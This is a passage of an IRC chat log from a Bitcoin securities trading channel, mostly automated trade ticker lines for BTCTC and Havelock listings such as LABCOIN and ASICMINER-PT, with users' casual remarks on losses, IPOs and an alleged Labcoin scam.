20:02:55 [BTCTC] [DMS.MINING] 100 @ 0.005351 = 0.5351 BTC [-] Aug 08 20:02:55 [BTCTC] [DMS.MINING] 100 @ 0.00535 = 0.535 BTC [-] Aug 08 20:02:56 [BTCTC] [DMS.MINING] 218 @ 0.005324 = 1.1606 BTC [-] Aug 08 20:02:57 [BTCTC] [DMS.MINING] 1 @ 0.005202 BTC [-] Aug 08 20:02:58 [BTCTC] [DMS.MINING] 80 @ 0.005099 = 0.4079 BTC [-] Aug 08 20:02:59 [BTCTC] [DMS.MINING] 100 @ 0.00501 = 0.501 BTC [-] Aug 08 20:03:00 [BTCTC] [DMS.MINING] 50 @ 0.005003 = 0.2502 BTC [-] Aug 08 20:03:01 [BTCTC] [DMS.MINING] 10 @ 0.005002 = 0.05 BTC [-] Aug 08 20:03:02 [BTCTC] [DMS.MINING] 100 @ 0.005001 = 0.5001 BTC [-] Aug 08 20:03:03 [BTCTC] [DMS.MINING] 20 @ 0.005 = 0.1 BTC [-] Aug 08 20:03:04 [BTCTC] [DMS.MINING] 9 @ 0.005 = 0.045 BTC [-] Aug 08 20:03:04 [BTCTC] [DMS.MINING] 10 @ 0.005 = 0.05 BTC [-] Aug 08 20:03:05 [BTCTC] [DMS.MINING] 400 @ 0.005 = 2 BTC [-] Aug 08 20:03:12 [BTCTC] [ACTIVEMINING] 50 @ 0.005416 = 0.2708 BTC [+] Aug 08 20:03:21 [BTCTC] [ASICMINER-PT] 1 @ 3.464 BTC [-] Aug 08 20:03:50 [BTCTC] [LABCOIN] 50 @ 0.001488 = 0.0744 BTC [-] Aug 08 20:03:51 [BTCTC] [LABCOIN] 6 @ 0.001489 = 0.0089 BTC [+] Aug 08 20:03:52 [BTCTC] [LABCOIN] 6 @ 0.001492 = 0.009 BTC [+] Aug 08 20:03:54 [BTCTC] [LABCOIN] 50 @ 0.001493 = 0.0747 BTC [+] Aug 08 20:03:55 [BTCTC] [LABCOIN] 58 @ 0.001494 = 0.0867 BTC [+] Aug 08 20:03:57 [BTCTC] [LABCOIN] 471 @ 0.001495 = 0.7041 BTC [+] Aug 08 20:03:57 [BTCTC] [LABCOIN] 300 @ 0.001496 = 0.4488 BTC [+] Aug 08 20:03:57 [BTCTC] [LABCOIN] 1286 @ 0.001496 = 1.9239 BTC [+] Aug 08 20:03:58 [BTCTC] [LABCOIN] 500 @ 0.001497 = 0.7485 BTC [+] Aug 08 20:03:59 [BTCTC] [LABCOIN] 1273 @ 0.001497 = 1.9057 BTC [+] Aug 08 20:05:33 [BTCTC] [DMS.MINING] 100 @ 0.004902 = 0.4902 BTC [-] Aug 08 20:05:35 [BTCTC] [DMS.MINING] 254 @ 0.004901 = 1.2449 BTC [-] Aug 08 20:05:37 [BTCTC] [DMS.MINING] 10 @ 0.004901 = 0.049 BTC [-] Aug 08 20:05:40 [BTCTC] [DMS.MINING] 40 @ 0.0049 = 0.196 BTC [-] Aug 08 20:05:40 [BTCTC] [DMS.MINING] 110 @ 0.0048 = 0.528 BTC [-] Aug 08 20:05:41 [BTCTC] [DMS.MINING] 1 @ 0.0046 BTC [-] Aug 08 20:05:42 [BTCTC] [DMS.MINING] 1 @ 0.0045 BTC [-] Aug 08 20:05:42 [BTCTC] [DMS.MINING] 1 @ 0.004472 BTC [-] Aug 08 20:05:43 [BTCTC] [DMS.MINING] 150 @ 0.00423 = 0.6345 BTC [-] Aug 08 20:05:44 [BTCTC] [DMS.MINING] 25 @ 0.00421 = 0.1053 BTC [-] Aug 08 20:06:40 [BTCTC] [LABCOIN] 10 @ 0.001495 = 0.015 BTC [-] Aug 08 20:06:41 [BTCTC] [LABCOIN] 1000 @ 0.001496 = 1.496 BTC [+] Aug 08 20:06:43 [BTCTC] [LABCOIN] 1990 @ 0.001497 = 2.979 BTC [+] Aug 08 20:07:26 [BTCTC] [DMS.SELLING] 62 @ 0.02348 = 1.4558 BTC [+] Aug 08 20:07:27 [BTCTC] [DMS.SELLING] 50 @ 0.02349 = 1.1745 BTC [+] Aug 08 20:07:37 [BTCTC] [BASIC-MINING] 44 @ 0.223 = 9.812 BTC [-] Aug 08 20:07:39 [BTCTC] [BASIC-MINING] 23 @ 0.2219 = 5.1037 BTC [-] Aug 08 20:07:40 [BTCTC] [BASIC-MINING] 7 @ 0.2219 = 1.5533 BTC [-] Aug 08 20:07:40 [BTCTC] [BASIC-MINING] 26 @ 0.21 = 5.46 BTC [-] Aug 08 20:07:51 wth is wrong with basic. Aug 08 20:08:05 [HAVELOCK] [XBOND] 10000 @ 0.001047 = 10.47 BTC [+] Aug 08 20:08:47 it's not a problem with basic, creativx does great, i'd say Aug 08 20:08:52 [BTCTC] [LABCOIN] 10 @ 0.001496 = 0.015 BTC [-] Aug 08 20:08:53 [BTCTC] [LABCOIN] 440 @ 0.001497 = 0.6587 BTC [+] Aug 08 20:08:55 [HAVELOCK] [AM100] 7 @ 0.0353 = 0.2471 BTC [+] Aug 08 20:08:57 [HAVELOCK] [AM100] 2 @ 0.0352 = 0.0704 BTC [-] Aug 08 20:08:59 [HAVELOCK] [AM100] 11 @ 0.035 = 0.385 BTC [-] Aug 08 20:09:08 but people are investing in the new companies Aug 08 20:09:15 [BTCTC] [DMS.PURCHASE] 49 @ 0.02822 = 1.3828 BTC [-] Aug 08 20:09:18 [BTCTC] [LABCOIN] 1000 @ 0.001497 = 1.497 BTC [+] Aug 08 20:09:54 well, I'm down -50% or so. Aug 08 20:09:55 [BTCTC] [TAT.ASICMINER] 13 @ 0.0356 = 0.4628 BTC [-] Aug 08 20:09:56 [BTCTC] [TAT.ASICMINER] 8 @ 0.03509 = 0.2807 BTC [-] Aug 08 20:09:56 [BTCTC] [TAT.ASICMINER] 42 @ 0.03508 = 1.4734 BTC [-] Aug 08 20:10:14 yea, but same as cog Aug 08 20:10:22 well, almost :) Aug 08 20:12:21 [BTCTC] [TAT.ASICMINER] 2 @ 0.03582 = 0.0716 BTC [+] Aug 08 20:12:32 Basic and Cog are bound to.. rebound. Aug 08 20:12:47 [BTCTC] [DMS.SELLING] 32 @ 0.0235 = 0.752 BTC [+] Aug 08 20:13:19 they are very cheap in comparison to before, but is there much purchasing power left? Aug 08 20:13:51 icedrill ipos and maybe this crypto currency bank thing Aug 08 20:14:02 i like the crypto bank Aug 08 20:14:08 Crypto is an entirely different thing all together Aug 08 20:14:17 but dont see much of a reason to buy shares, i do want to be a customer though Aug 08 20:14:18 And it's on Havelock Aug 08 20:16:37 [BTCTC] [LABCOIN] 2000 @ 0.001497 = 2.994 BTC [+] Aug 08 20:17:09 [BTCTC] [ACTIVEMINING] 50 @ 0.005464 = 0.2732 BTC [+] Aug 08 20:17:10 [BTCTC] [ACTIVEMINING] 18 @ 0.005463 = 0.0983 BTC [-] Aug 08 20:17:12 [BTCTC] [ACTIVEMINING] 6 @ 0.005461 = 0.0328 BTC [-] Aug 08 20:17:13 [BTCTC] [ACTIVEMINING] 10 @ 0.005452 = 0.0545 BTC [-] Aug 08 20:17:14 [BTCTC] [ACTIVEMINING] 50 @ 0.005451 = 0.2726 BTC [-] Aug 08 20:17:15 [BTCTC] [ACTIVEMINING] 15 @ 0.005396 = 0.0809 BTC [-] Aug 08 20:17:16 [BTCTC] [ACTIVEMINING] 79 @ 0.005395 = 0.4262 BTC [-] Aug 08 20:17:17 [BTCTC] [ACTIVEMINING] 80 @ 0.005356 = 0.4285 BTC [-] Aug 08 20:17:19 [BTCTC] [ACTIVEMINING] 100 @ 0.005355 = 0.5355 BTC [-] Aug 08 20:17:19 [BTCTC] [ACTIVEMINING] 300 @ 0.005354 = 1.6062 BTC [-] Aug 08 20:18:18 [BTCTC] [LABCOIN] 750 @ 0.001497 = 1.1228 BTC [+] Aug 08 20:18:26 I don't see any reason to buy shares either… I could consider it like a kickstarter though :p Aug 08 20:19:38 [BTCTC] [ACTIVEMINING] 25 @ 0.005353 = 0.1338 BTC [-] Aug 08 20:19:40 [BTCTC] [ACTIVEMINING] 56 @ 0.005352 = 0.2997 BTC [-] Aug 08 20:20:04 bit of a weird IPO reason aswell.. to reduce fee's Aug 08 20:20:16 [BTCTC] [LABCOIN] 2547 @ 0.001497 = 3.8129 BTC [+] Aug 08 20:20:17 [BTCTC] [LABCOIN] 1 @ 0.001497 BTC [+] Aug 08 20:20:34 [BTCTC] [LABCOIN] 1000 @ 0.0015 = 1.5 BTC [+] Aug 08 20:21:53 [HAVELOCK] [HIM] 18 @ 0.13301002 = 2.3942 BTC [-] Aug 08 20:21:56 [HAVELOCK] [HIM] 8 @ 0.13301001 = 1.0641 BTC [-] Aug 08 20:21:58 [HAVELOCK] [HIM] 10 @ 0.13301 = 1.3301 BTC [-] Aug 08 20:22:00 [BTCTC] [LABCOIN] 500 @ 0.00153 = 0.765 BTC [+] Aug 08 20:22:14 [HAVELOCK] [HIM] 80 @ 0.13 = 10.4 BTC [-] Aug 08 20:22:53 [BTCTC] [BTCGARDEN] 120 @ 0.01561 = 1.8732 BTC [+] Aug 08 20:22:54 [BTCTC] [BTCGARDEN] 345 @ 0.0156 = 5.382 BTC [-] Aug 08 20:23:42 [BTCTC] [LABCOIN] 400 @ 0.00153 = 0.612 BTC [+] Aug 08 20:23:43 [BTCTC] [LABCOIN] 800 @ 0.001543 = 1.2344 BTC [+] Aug 08 20:23:44 [BTCTC] [LABCOIN] 50 @ 0.001554 = 0.0777 BTC [+] Aug 08 20:23:46 [BTCTC] [LABCOIN] 500 @ 0.001555 = 0.7775 BTC [+] Aug 08 20:23:47 [BTCTC] [LABCOIN] 1158 @ 0.001556 = 1.8018 BTC [+] Aug 08 20:23:48 [BTCTC] [LABCOIN] 200 @ 0.001586 = 0.3172 BTC [+] Aug 08 20:23:49 [BTCTC] [LABCOIN] 661 @ 0.001587 = 1.049 BTC [+] Aug 08 20:23:50 [BTCTC] [LABCOIN] 400 @ 0.001587 = 0.6348 BTC [+] Aug 08 20:23:50 [BTCTC] [LABCOIN] 381 @ 0.001588 = 0.605 BTC [+] Aug 08 20:24:04 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.002232 = 0.0134 BTC [-] Aug 08 20:24:49 [BTCTC] [BMF] 2 @ 0.033 = 0.066 BTC [-] Aug 08 20:25:23 [BTCTC] [ACTIVEMINING] 50 @ 0.005352 = 0.2676 BTC [-] Aug 08 20:25:25 [BTCTC] [ACTIVEMINING] 218 @ 0.005352 = 1.1667 BTC [-] Aug 08 20:25:43 [BTCTC] [BITVPS] 7 @ 0.001901 = 0.0133 BTC [-] Aug 08 20:27:47 [BTCTC] [BASIC-MINING] 1 @ 0.2199 BTC [+] Aug 08 20:28:31 [BTCTC] [DMS.PURCHASE] 52 @ 0.02822 = 1.4674 BTC [-] Aug 08 20:30:42 [BTCTC] [LABCOIN] 300 @ 0.001585 = 0.4755 BTC [-] Aug 08 20:32:07 [BTCTC] [LABCOIN] 900 @ 0.001585 = 1.4265 BTC [-] Aug 08 20:32:08 [BTCTC] [LABCOIN] 619 @ 0.001586 = 0.9817 BTC [+] Aug 08 20:32:10 [BTCTC] [LABCOIN] 11000 @ 0.001586 = 17.446 BTC [+] Aug 08 20:32:10 [BTCTC] [LABCOIN] 2000 @ 0.001586 = 3.172 BTC [+] Aug 08 20:32:11 [BTCTC] [LABCOIN] 481 @ 0.001587 = 0.7633 BTC [+] Aug 08 20:33:11 [BTCTC] [LABCOIN] 650 @ 0.001584 = 1.0296 BTC [-] Aug 08 20:33:58 [BTCTC] [ASICMINER-PT] 1 @ 3.594 BTC [+] Aug 08 20:34:18 [BTCTC] [LABCOIN] 2545 @ 0.001583 = 4.0287 BTC [-] Aug 08 20:34:20 [BTCTC] [LABCOIN] 3455 @ 0.001584 = 5.4727 BTC [+] Aug 08 20:34:32 [BTCTC] [TAT.ASICMINER] 2 @ 0.03539 = 0.0708 BTC [-] Aug 08 20:35:28 [BTCTC] [ASICMINER-PT] 2 @ 3.467 = 6.934 BTC [-] Aug 08 20:35:55 [HAVELOCK] [AM100] 8 @ 0.035 = 0.28 BTC [-] Aug 08 20:35:57 [HAVELOCK] [AM100] 10 @ 0.035 = 0.35 BTC [-] Aug 08 20:36:00 [HAVELOCK] [AM100] 52 @ 0.035 = 1.82 BTC [-] Aug 08 20:37:07 [BTCTC] [LABCOIN] 1 @ 0.001584 BTC [+] Aug 08 20:37:26 [BTCTC] [TAT.ASICMINER] 4 @ 0.0351 = 0.1404 BTC [-] Aug 08 20:38:45 [HAVELOCK] [XBOND] 95 @ 0.0010469 = 0.0995 BTC [-] Aug 08 20:39:42 [BTCTC] [TAT.ASICMINER] 10 @ 0.03501 = 0.3501 BTC [-] Aug 08 20:39:43 [BTCTC] [TAT.ASICMINER] 3 @ 0.03501 = 0.105 BTC [-] Aug 08 20:39:45 [BTCTC] [TAT.ASICMINER] 2 @ 0.035 = 0.07 BTC [-] Aug 08 20:39:46 [BTCTC] [TAT.ASICMINER] 25 @ 0.035 = 0.875 BTC [-] Aug 08 20:39:47 [BTCTC] [TAT.ASICMINER] 3 @ 0.035 = 0.105 BTC [-] Aug 08 20:39:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.035 BTC [-] Aug 08 20:39:49 [BTCTC] [TAT.ASICMINER] 10 @ 0.035 = 0.35 BTC [-] Aug 08 20:39:50 [BTCTC] [TAT.ASICMINER] 10 @ 0.035 = 0.35 BTC [-] Aug 08 20:40:42 [BTCTC] [ASICMINER-PT] 1 @ 3.594 BTC [+] Aug 08 20:41:26 [BTCTC] [TAT.VIRTUALMINE] 150 @ 0.002232 = 0.3348 BTC [-] Aug 08 20:42:31 [HAVELOCK] [XBOND] 14 @ 0.0010469 = 0.0147 BTC [-] Aug 08 20:42:43 [BTCTC] [ASICMINER-PT] 1 @ 3.593 BTC [-] Aug 08 20:42:44 [BTCTC] [ASICMINER-PT] 1 @ 3.595 BTC [+] Aug 08 20:42:45 [BTCTC] [ASICMINER-PT] 1 @ 3.599 BTC [+] Aug 08 20:43:27 [BTCTC] [BTCGARDEN] 549 @ 0.0156 = 8.5644 BTC [-] Aug 08 20:43:29 [BTCTC] [BTCGARDEN] 900 @ 0.0156 = 14.04 BTC [-] Aug 08 20:43:30 [BTCTC] [BTCGARDEN] 35 @ 0.0156 = 0.546 BTC [-] Aug 08 20:43:31 [BTCTC] [BTCGARDEN] 516 @ 0.0156 = 8.0496 BTC [-] Aug 08 20:43:43 [BTCTC] [BASIC-MINING] 2 @ 0.2199 = 0.4398 BTC [+] Aug 08 20:43:46 [BTCTC] [BASIC-MINING] 10 @ 0.22 = 2.2 BTC [+] Aug 08 20:43:46 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.002232 = 0.0112 BTC [-] Aug 08 20:44:41 I suspect that lc will take another price boost after the management does their own q&a Aug 08 20:49:35 only if enough muppets get on the "i suspect" bandwagon/ Aug 08 20:49:39 seems unlike.y Aug 08 20:50:40 [HAVELOCK] [XBOND] 610 @ 0.0010469 = 0.6386 BTC [-] Aug 08 20:50:56 oh mp Aug 08 20:50:59 You saw what one tech Q&A did, the mgnt q&a should have a similar response. I'm not talking huge or anything or lasting for that matter. Aug 08 20:51:53 !t btct labcoin Aug 08 20:51:54 [HAVELOCK] [XBOND] 898 @ 0.0010469 = 0.9401 BTC [-] Aug 08 20:51:57 [BTCT:LABCOIN] 1D: 0.001167 / 0.00138 / 0.001588 (298554 shares, 413 BTC), 7D: 0.001052 / 0.00168 / 0.002516 (2897403 shares, 4870.1 BTC), 30D: 0.001 / 0.0015 / 0.0044 (12233008 shares, 18311.8 BTC) Aug 08 20:52:11 heh Aug 08 20:52:34 today's max well below week's average. seems just about right. Aug 08 20:52:46 [BTCTC] [LABCOIN] 1500 @ 0.001572 = 2.358 BTC [-] Aug 08 20:52:58 [MPEX] [S.MPOE] 4150 @ 0.00083202 = 3.4529 BTC [-] Aug 08 20:53:56 The weekly average also takes in when the ipo was near it's peak Aug 08 20:53:58 [BTCTC] [LABCOIN] 2500 @ 0.001572 = 3.93 BTC [-] Aug 08 20:55:02 [BTCTC] [DMS.MINING] 2 @ 0.005398 = 0.0108 BTC [+] Aug 08 21:00:44 [BTCTC] [LABCOIN] 3550 @ 0.00148 = 5.254 BTC [-] Aug 08 21:01:55 [BTCTC] [BASIC-MINING] 1 @ 0.2236 BTC [+] Aug 08 21:02:45 [HAVELOCK] [SMG] 10 @ 0.000237 = 0.0024 BTC [-] Aug 08 21:04:44 [BTCTC] [DMS.MINING] 2 @ 0.005396 = 0.0108 BTC [-] Aug 08 21:07:04 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.002232 = 0.2232 BTC [-] Aug 08 21:09:31 [BTCTC] [LABCOIN] 50 @ 0.001571 = 0.0786 BTC [+] Aug 08 21:09:32 [BTCTC] [LABCOIN] 7319 @ 0.001571 = 11.4981 BTC [+] Aug 08 21:09:32 [BTCTC] [LABCOIN] 70 @ 0.001572 = 0.11 BTC [+] Aug 08 21:09:34 [BTCTC] [LABCOIN] 8924 @ 0.001573 = 14.0375 BTC [+] Aug 08 21:09:36 On a side note, pita chips, peanut butter and sriracha is tasty Aug 08 21:11:03 [BTCTC] [BASIC-MINING] 1 @ 0.2277 BTC [+] Aug 08 21:11:35 [BTCTC] [LABCOIN] 1050 @ 0.001565 = 1.6433 BTC [-] Aug 08 21:12:09 [BTCTC] [ASICMINER-PT] 1 @ 3.472 BTC [-] Aug 08 21:12:23 [BTCTC] [ASICMINER-PT] 1 @ 3.472 BTC [-] Aug 08 21:13:07 [BTCTC] [TAT.VIRTUALMINE] 55 @ 0.002232 = 0.1228 BTC [-] Aug 08 21:13:08 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002204 BTC [-] Aug 08 21:13:10 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0021 BTC [-] Aug 08 21:13:11 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0021 BTC [-] Aug 08 21:13:11 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001803 BTC [-] Aug 08 21:13:33 [BTCTC] [TAT.ASICMINER] 6 @ 0.03612 = 0.2167 BTC [+] Aug 08 21:14:03 [BTCTC] [RSM] 3 @ 0.0119 = 0.0357 BTC [+] Aug 08 21:15:30 [HAVELOCK] [AM100] 3 @ 0.0351 = 0.1053 BTC [+] Aug 08 21:15:33 [HAVELOCK] [AM100] 1 @ 0.0351 BTC [+] Aug 08 21:15:37 [BTCTC] [ASICMINER-PT] 3 @ 3.47 = 10.41 BTC [-] Aug 08 21:16:45 [BTCTC] [ASICMINER-PT] 1 @ 3.471 BTC [+] Aug 08 21:16:57 [BTCTC] [ACTIVEMINING] 3 @ 0.005475 = 0.0164 BTC [+] Aug 08 21:17:02 lol Aug 08 21:17:05 love sriratcha Aug 08 21:17:30 Yeah it's raining cats and dogs by my work so I don't much feel like driving for food so I made use of what I had lol Aug 08 21:18:34 [BTCTC] [BASIC-MINING] 6 @ 0.2278 = 1.3668 BTC [+] Aug 08 21:18:47 [BTCTC] [ASICMINER-PT] 1 @ 3.47 BTC [-] Aug 08 21:19:44 [HAVELOCK] [XBOND] 49 @ 0.0010469 = 0.0513 BTC [-] Aug 08 21:20:51 [BTCTC] [ACTIVEMINING] 2 @ 0.005459 = 0.0109 BTC [-] Aug 08 21:21:37 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00223 BTC [+] Aug 08 21:21:52 [BTCTC] [ACTIVEMINING] 45 @ 0.005352 = 0.2408 BTC [-] Aug 08 21:21:53 [BTCTC] [ACTIVEMINING] 25 @ 0.005351 = 0.1338 BTC [-] Aug 08 21:21:55 [BTCTC] [ACTIVEMINING] 10 @ 0.00535 = 0.0535 BTC [-] Aug 08 21:21:56 [BTCTC] [ACTIVEMINING] 220 @ 0.005349 = 1.1768 BTC [-] Aug 08 21:21:57 [HAVELOCK] [AM100] 16 @ 0.0351 = 0.5616 BTC [+] Aug 08 21:22:11 [BTCTC] [LABCOIN] 150 @ 0.001565 = 0.2348 BTC [-] Aug 08 21:22:13 [BTCTC] [ASICMINER-PT] 1 @ 3.474 BTC [+] Aug 08 21:22:15 [BTCTC] [ASICMINER-PT] 1 @ 3.473 BTC [-] Aug 08 21:22:52 [BTCTC] [BTCGARDEN] 14 @ 0.01561 = 0.2185 BTC [+] Aug 08 21:22:54 [BTCTC] [BTCGARDEN] 11 @ 0.0156 = 0.1716 BTC [-] Aug 08 21:23:27 [BTCTC] [TAT.ASICMINER] 67 @ 0.03515 = 2.3551 BTC [-] Aug 08 21:23:28 [BTCTC] [TAT.ASICMINER] 14 @ 0.03513 = 0.4918 BTC [-] Aug 08 21:23:30 [BTCTC] [TAT.ASICMINER] 6 @ 0.0351 = 0.2106 BTC [-] Aug 08 21:23:31 [BTCTC] [TAT.ASICMINER] 8 @ 0.03501 = 0.2801 BTC [-] Aug 08 21:23:32 [BTCTC] [TAT.ASICMINER] 40 @ 0.035 = 1.4 BTC [-] Aug 08 21:23:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.03475 BTC [-] Aug 08 21:23:34 [BTCTC] [TAT.ASICMINER] 9 @ 0.03474 = 0.3127 BTC [-] Aug 08 21:23:36 [BTCTC] [TAT.ASICMINER] 3 @ 0.0347 = 0.1041 BTC [-] Aug 08 21:23:37 [BTCTC] [TAT.ASICMINER] 4 @ 0.0343 = 0.1372 BTC [-] Aug 08 21:23:38 [BTCTC] [TAT.ASICMINER] 20 @ 0.03403 = 0.6806 BTC [-] Aug 08 21:23:39 [BTCTC] [TAT.ASICMINER] 10 @ 0.03402 = 0.3402 BTC [-] Aug 08 21:24:07 [HAVELOCK] [AM100] 85 @ 0.035 = 2.975 BTC [-] Aug 08 21:25:26 [BTCTC] [BASIC-MINING] 3 @ 0.2279 = 0.6837 BTC [+] Aug 08 21:25:28 [BTCTC] [BASIC-MINING] 1 @ 0.2299 BTC [+] Aug 08 21:25:29 [BTCTC] [BASIC-MINING] 4 @ 0.23 = 0.92 BTC [+] Aug 08 21:26:32 [BTCTC] [COGNITIVE] 2 @ 0.314 = 0.628 BTC [-] Aug 08 21:26:34 [BTCTC] [COGNITIVE] 5 @ 0.314 = 1.57 BTC [-] Aug 08 21:27:37 moar https://bitcointalk.org/index.php?topic=270221.0 Aug 08 21:28:58 why is everything a platform these days Aug 08 21:29:05 they went out of fashion with the bellbottoms Aug 08 21:29:06 [BTCTC] [DMS.MINING] 14 @ 0.004999 = 0.07 BTC [-] Aug 08 21:30:09 mircea_popescu: wow, looks like you are right Aug 08 21:30:22 ? Aug 08 21:30:28 impossible Aug 08 21:30:34 lol Aug 08 21:30:36 [BTCTC] [ASICMINER-PT] 1 @ 3.467 BTC [-] Aug 08 21:30:45 mircea_popescu: https://bitcointalk.org/index.php?topic=263445.1880 Aug 08 21:31:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.03501 = 0.14 BTC [+] Aug 08 21:31:57 [BTCTC] [ACTIVEMINING] 16 @ 0.005422 = 0.0868 BTC [+] Aug 08 21:32:10 [BTCTC] [ASICMINER-PT] 1 @ 3.47 BTC [+] Aug 08 21:32:37 i can't be reading all that Aug 08 21:32:41 mind giving an executive summary ? Aug 08 21:33:12 oh, i can summarize Aug 08 21:33:32 "it's very unlikely we are making everything up" Aug 08 21:33:40 [BTCTC] [DMS.MINING] 2 @ 0.004999 = 0.01 BTC [-] Aug 08 21:33:49 mircea_popescu: http://rghost.ru/47986259 Aug 08 21:33:59 labcoin_scam_part1.pdf Aug 08 21:34:09 lawl Aug 08 21:34:14 [BTCTC] [ASICMINER-PT] 1 @ 3.585 BTC [+] Aug 08 21:34:15 [BTCTC] [ASICMINER-PT] 1 @ 3.587 BTC [+] Aug 08 21:34:16 [BTCTC] [ASICMINER-PT] 1 @ 3.588 BTC [+] Aug 08 21:34:18 lol Aug 08 21:34:20 yes please mp download that and tell us what you think :P Aug 08 21:34:25 you should probably start a wp blog Aug 08 21:34:30 all answers they gave during IRC was wrong Aug 08 21:34:32 much more efficient than some pdf stuff Aug 08 21:34:34 [BTCTC] [ASICMINER-PT] 1 @ 3.589 BTC [+] Aug 08 21:34:44 they contradicted themselves Aug 08 21:37:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.03502 BTC [+] Aug 08 21:38:04 [BTCTC] [DMS.MINING] 4 @ 0.004999 = 0.02 BTC [-] Aug 08 21:38:48 [BTCTC] [DMS.SELLING] 52 @ 0.02399 = 1.2475 BTC [+] Aug 08 21:38:49 [BTCTC] [DMS.SELLING] 231 @ 0.02399 = 5.5417 BTC [+] Aug 08 21:38:51 [BTCTC] [DMS.SELLING] 17 @ 0.024 = 0.408 BTC [+] Aug 08 21:39:04 [BTCTC] [COGNITIVE] 1 @ 0.311 BTC [-] Aug 08 21:39:50 [BTCTC] [BASIC-MINING] 1 @ 0.23 BTC [+] Aug 08 21:40:18 [HAVELOCK] [AM1] 1 @ 3.68999999 BTC [+] Aug 08 21:40:48 [HAVELOCK] [AM100] 3 @ 0.0354 = 0.1062 BTC [+] Aug 08 21:41:11 [BTCTC] [LABCOIN] 3800 @ 0.001565 = 5.947 BTC [-] Aug 08 21:44:38 [BTCTC] [BMF] 13 @ 0.03305 = 0.4297 BTC [+] Aug 08 21:44:41 [BTCTC] [BMF] 1 @ 0.03305 BTC [+] Aug 08 21:45:41 [BTCTC] [BASIC-MINING] 5 @ 0.23 = 1.15 BTC [+] Aug 08 21:46:00 wat? BMF is back Aug 08 21:46:32 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002235 BTC [+] Aug 08 21:47:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.03566 BTC [+] Aug 08 21:49:25 [HAVELOCK] [AM100] 7 @ 0.0354 = 0.2478 BTC [+] Aug 08 21:49:29 or has it been there and no one traded it Aug 08 21:49:40 Been there Aug 08 21:49:41 [BTCTC] [DMS.MINING] 226 @ 0.004996 = 1.1291 BTC [-] Aug 08 21:49:57 [HAVELOCK] [AM100] 5 @ 0.0355 = 0.1775 BTC [+] Aug 08 21:49:58 whew, I was about to sell all my BTC and leave Aug 08 21:49:59 [BTCTC] [DMS.MINING] 20 @ 0.004999 = 0.1 BTC [+] Aug 08 21:52:34 [HAVELOCK] [XBOND] 586 @ 0.0010469 = 0.6135 BTC [-] Aug 08 21:52:46 [HAVELOCK] [XBOND] 1898 @ 0.00104699 = 1.9872 BTC [+] Aug 08 21:53:15 [BTCTC] [DMS.MINING] 1 @ 0.005 BTC [+] Aug 08 21:53:33 [HAVELOCK] [XBOND] 2089 @ 0.001047 = 2.1872 BTC [+] Aug 08 21:57:23 [BTCTC] [BITVPS] 1 @ 0.002095 BTC [+] Aug 08 21:57:23 [BTCTC] [DMS.MINING] 4 @ 0.005 = 0.02 BTC [+] Aug 08 21:57:23 [HAVELOCK] [XBOND] 9 @ 0.001047 = 0.0094 BTC [+] Aug 08 21:57:24 [BTCTC] [BTCGARDEN] 28 @ 0.01586 = 0.4441 BTC [+] Aug 08 21:58:24 [BTCTC] [BTCGARDEN] 28 @ 0.01586 = 0.4441 BTC [+] Aug 08 21:58:25 [BTCTC] [BASIC-MINING] 4 @ 0.24 = 0.96 BTC [+] Aug 08 21:58:26 [BTCTC] [BTCGARDEN] 1 @ 0.01587 BTC [+] Aug 08 21:58:27 [BTCTC] [BTCGARDEN] 571 @ 0.01587 = 9.0618 BTC [+] Aug 08 21:59:57 [BTCTC] [ACTIVEMINING] 20 @ 0.005432 = 0.1086 BTC [+] Aug 08 22:00:25 [BTCTC] [BASIC-MINING] 2 @ 0.24 = 0.48 BTC [+] Aug 08 22:02:16 [BTCTC] [LABCOIN] 200 @ 0.001564 = 0.3128 BTC [-] Aug 08 22:06:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.03552 BTC [-] Aug 08 22:11:38 [BTCTC] [TAT.ASICMINER] 8 @ 0.03552 = 0.2842 BTC [-] Aug 08 22:11:39 [BTCTC] [TAT.ASICMINER] 26 @ 0.03552 = 0.9235 BTC [-] Aug 08 22:11:51 [HAVELOCK] [XBOND] 750 @ 0.001046 = 0.7845 BTC [-] Aug 08 22:12:47 [BTCTC] [DMS.PURCHASE] 20 @ 0.02822 = 0.5644 BTC [-] Aug 08 22:16:09 [BTCTC] [ACTIVEMINING] 25 @ 0.005442 = 0.1361 BTC [+] Aug 08 22:17:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.03502 BTC [-] Aug 08 22:18:00 [BTCTC] [LABCOIN] 50 @ 0.001521 = 0.0761 BTC [-] Aug 08 22:18:37 [BTCTC] [LABCOIN] 50 @ 0.001522 = 0.0761 BTC [+] Aug 08 22:18:39 [BTCTC] [LABCOIN] 185 @ 0.001521 = 0.2814 BTC [-] Aug 08 22:23:32 [BTCTC] [NASTY-PT] 6 @ 0.003501 = 0.021 BTC [-] Aug 08 22:23:33 [BTCTC] [NASTY-PT] 3 @ 0.0035 = 0.0105 BTC [-] Aug 08 22:24:02 [BTCTC] [TAT.ASICMINER] 9 @ 0.03411 = 0.307 BTC [-] Aug 08 22:24:53 [BTCTC] [DMS.MINING] 20 @ 0.004903 = 0.0981 BTC [-] Aug 08 22:25:12 [BTCTC] [ACTIVEMINING] 50 @ 0.005362 = 0.2681 BTC [-] Aug 08 22:25:14 [BTCTC] [ACTIVEMINING] 830 @ 0.005361 = 4.4496 BTC [-] Aug 08 22:25:15 [BTCTC] [ACTIVEMINING] 30 @ 0.00536 = 0.1608 BTC [-] Aug 08 22:25:16 [BTCTC] [ACTIVEMINING] 90 @ 0.00535 = 0.4815 BTC [-] Aug 08 22:25:33 [BTCTC] [NASTY-PT] 1 @ 0.00199 BTC [-] Aug 08 22:25:50 [BTCTC] [NASTY-PT] 1 @ 0.0029 BTC [+] Aug 08 22:26:14 [BTCTC] [ACTIVEMINING] 8 @ 0.00543 = 0.0434 BTC [+] Aug 08 